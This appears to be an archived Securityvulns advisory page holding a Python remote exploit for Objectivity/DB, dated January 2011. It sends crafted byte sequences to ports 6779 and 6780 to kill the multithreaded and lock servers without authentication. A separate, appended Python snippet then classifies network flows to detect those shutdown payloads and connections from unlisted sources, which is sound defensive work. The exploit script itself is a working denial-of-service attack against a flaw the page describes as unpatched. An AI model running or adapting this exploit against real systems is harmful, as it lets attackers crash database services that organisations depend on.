Securityvulns SECURITYVULNS:DOC:25495
Jan 18, 2011 - 12:00 a.m.

Objectivity/DB Lack of Authentication Remote Exploit

#!/usr/bin/python
# obj.py
#
# Objectivity/DB Lack of Authentication Remote Exploit
#
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# "Objectivity, Inc. is a leader in distributed, scalable database technology.
# Our patented data management engine and persistent object store is the enabling
# technology powering some of the most complex applications and mission critical
# systems used in government, business and science organizations today."
#
# Objectivity/DB includes many different tools for administration. The
# problem is, anyone can use these tools to perform operations on the host
# running the lock server, advanced multithreaded server, and probably
# its other servers as well, without any authentication. This design flaw
# puts the host running these servers at risk of potentially unauthorized
# operations being performed on the system, locally or remotely.
#
# This code demonstrates a couple of the easiest operations to replicate
# by hand, like killing the lock and am servers. The suite contains lots
# of other admin tools that do various, more interesting tasks with the
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc…
#
# Tested on Objectivity/DB 10 running on Windows
#
# Fixed version: N/A, US-CERT coordinated the communication and released
# a vulnerability note after the vendor did not provide additional feedback.
#
# http://www.kb.cert.org/vuls/id/782567

import sys
import socket

kill_ooams=(
"\x0d\x03"+
"\x00"*5+
"\x02"+
"\x00"*3+
"\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+
"\x00"*15+
"\x61\x62\x63"+
"\x00"+
"\x31\x32\x33\x34"+
"\x00"*3+
"\x05\x8c"+
"\x00"*3+
"\x0d"+
"\x00"*4
)

kill_ools=(
"\x0d\x03"+
"\x00"*5+
"\x77"+
"\x00"*3+
"\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+
"\x00"*15
)

if len(sys.argv)<3:
    print "Objectivity/DB Remote Exploit"
    print "Usage: %s <target> <operation>"%sys.argv[0]
    print "\nWhat would you like to do?\n"
    print "[1] Kill the advanced multithreaded server"
    print "[2] Kill the lock server"
    print "For other operations, check out oobackup, oodebug, etc"
    sys.exit(0)

target=sys.argv[1]
op=int(sys.argv[2])

if((op<1)|(op>2)):
    print "Invalid operation"
    sys.exit(1)

if(op==1):
    port=6779
    data=kill_ooams

if(op==2):
    port=6780
    data=kill_ools

cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(data)

sock.close()
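
With no fixed version listed and no authentication on the servers, a defender is left with restricting and monitoring who can reach ports 6779 and 6780. The following is an added example, not part of the original advisory or script: it labels observed connections by source address and by whether the payload begins like the two requests above. `ADMIN_NETS`, the record layout and the sample flows are constructed assumptions, and treating the shared leading bytes as a request header is also an assumption.

```python
import ipaddress

AMS_PORT, LOCK_PORT = 6779, 6780  # ports the script above connects to
# First 7 bytes shared by both payloads on this page. Treating them as a
# request header is an assumption; the wire protocol is not documented here.
SHARED_PREFIX = b"\x0d\x03" + b"\x00" * 5
# Byte at offset 7 of the payload the script sends to each port.
PAGE_OP_BYTE = {AMS_PORT: 0x02, LOCK_PORT: 0x77}
# Hypothetical admin subnet allowed to reach the servers (assumption).
ADMIN_NETS = [ipaddress.ip_network("10.0.5.0/28")]


def classify(src_ip, dst_port, payload):
    """Label one observed TCP payload sent to an Objectivity/DB server port."""
    if dst_port not in PAGE_OP_BYTE:
        return "ignore"
    trusted = any(ipaddress.ip_address(src_ip) in net for net in ADMIN_NETS)
    matches_page = (
        len(payload) > 7
        and payload.startswith(SHARED_PREFIX)
        and payload[7] == PAGE_OP_BYTE[dst_port]
    )
    if trusted:
        return "admin-shutdown" if matches_page else "admin"
    return "unauth-shutdown-pattern" if matches_page else "unexpected-source"


def triage(flows):
    """Return (src, port, label) for every flow that needs attention."""
    alerts = []
    for src, port, payload in flows:
        label = classify(src, port, payload)
        if label not in ("ignore", "admin"):
            alerts.append((src, port, label))
    return alerts


# Constructed sample records: (source IP, destination port, first payload bytes).
SAMPLE_FLOWS = [
    ("10.0.5.3", 6780, b"\x01\x00\x00\x00"),                      # admin, other request
    ("10.0.5.4", 6779, SHARED_PREFIX + b"\x02" + b"\x00" * 3),    # admin stops AMS
    ("192.0.2.50", 6780, SHARED_PREFIX + b"\x77" + b"\x00" * 3),  # outsider, lock server
    ("192.0.2.51", 6779, b"\x00" * 12),                           # outsider, other bytes
    ("192.0.2.52", 443, b"\x16\x03\x01"),                         # unrelated port
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_FLOWS):
        print(alert)
```

Any connection to these ports from outside the allowlist is reported even when the payload does not match, since the advisory notes that the other admin tools are equally unauthenticated.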